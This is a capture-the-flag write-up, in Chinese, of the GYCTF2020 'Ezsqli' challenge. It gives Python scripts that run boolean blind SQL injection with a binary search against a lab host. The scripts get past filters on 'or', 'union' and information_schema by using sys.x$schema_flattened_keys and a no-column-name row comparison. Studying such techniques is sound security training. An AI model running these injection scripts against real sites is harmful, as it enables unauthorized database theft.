[GYCTF2020]Ezsqli 无列名注入

 

 手工注入了几下，是数字注入，过滤了 or , union

输入1||1=1   回显Nu1L

再输入

1&&(ascii(substr(database(),1,1))>32)#

也是成功回显，那么就简单了，直接上脚本

加上time.sleep(0.1)可以避免访问过于频繁而导致429，用二分法爆破将快很多

import requests
import time
url = 'http://a713b075-e461-480d-82a8-36c99d85f52e.node3.buuoj.cn'
i = 0
flag = ''
while True:
    i += 1
    begin = 32
    end = 126
    tmp = (begin + end) // 2
    while begin < end:
        #print(begin, tmp, end)
        time.sleep(0.1)
        payload = {"id":"1&&(ascii(substr(database(),%d,1))>%d)#" % (i, tmp)}
　　　　 #payload = {"id":"1&&(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(sys.x$schema_flattened_keys)where(TABLE_SCHEMA=database())),%d,1))>%d)#" % (i, tmp)}

        r = requests.post(url,data=payload)
        if 'Nu1L' in r.text:
            begin = tmp + 1
            tmp = (begin + end) // 2
        else:
            end = tmp
            tmp = (begin + end) // 2

    flag += chr(tmp)
    print(flag)
    if begin == 32:
        break

 

接着试一下能不能爆表名，发现information_schema库用不了，使用sys.x$schema_flattened_keys

payload = {"id":"1&&(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(sys.x$schema_flattened_keys)where(TABLE_SCHEMA=database())),%d,1))>%d)#" % (i, tmp)}

 

字段的爆破采用无列名注入

1&&((select 1,'a') < (select * from f1ag_1s_h3r3_hhhhh))

 

 字符串的比较不是比较字符串的长度，而是比较第一个字符的ascii码值

如果第一个ascii码值相等，那么比较第二个字符

那么脚本就出来了

import requests
import time
url="http://a713b075-e461-480d-82a8-36c99d85f52e.node3.buuoj.cn"
flag=''

while True:
    begin=32
    end=126
    tmp=(begin+end)//2
    while begin<end:
        time.sleep(0.1)
        payload = {"id":"1&&((select 1,'{}') < (select * from f1ag_1s_h3r3_hhhhh))".format(flag+chr(tmp))}
        re=requests.post(url,data=payload)
        if 'Nu1L' in re.text:
            #rint(tmp)
            begin = tmp + 1
            tmp = (begin + end) // 2
            #print(tmp)
        else:
            end = tmp
            tmp = (begin + end) // 2

    flag+=chr(tmp-1)
    print(flag)